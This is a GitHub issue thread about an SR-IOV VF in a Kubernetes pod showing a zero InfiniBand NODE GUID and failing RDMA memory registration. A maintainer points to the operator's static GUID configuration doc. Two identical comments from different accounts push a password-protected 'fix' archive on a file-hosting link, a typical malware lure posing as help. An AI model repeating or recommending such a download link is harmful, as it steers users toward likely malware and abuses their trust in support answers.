### ISSUE TITLE
pod with VF doesn't get NODE GUID

### ISSUE THREAD

**Issue by jeffreyyjp** [k8snetworkplumbingwg/sriov-network-device-plugin#590]
### What happened?
After create pod use this repo demo, I can see the VF use ibstat or ibdev2netdev. But I find VF‘s NODE GUID is `0000:0000:0000:0000`. And when I do ib_write_bw test. It shows
```
Couldn't allocate MR
failed to create mr
Failed to create MR
 Couldn't create IB resources
```
### Component Versions
Please fill in the below table with the version numbers of components used.

Component | Version|
------------------------------|--------------------|
|SR-IOV Network Device Plugin |<Input Version Here>|
|SR-IOV CNI Plugin            |<Input Version Here>|
|Multus                       |<Input Version Here>|
|Kubernetes                   |<Input Version Here>| 
|OS                           |<Input Version Here>|

### Config Files
Config file locations may be config dependent.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SchSeba** [comment]
Hi @jeffreyyjp,

please take a look on the sriov-network-operator it should help you configure the IB https://github.com/k8snetworkplumbingwg/sriov-network-operator/blob/master/doc/ib-vf-guid-static-configuration.md

**Comment by jeffreyyjp** [comment]
@SchSeba Got it. Thank you.
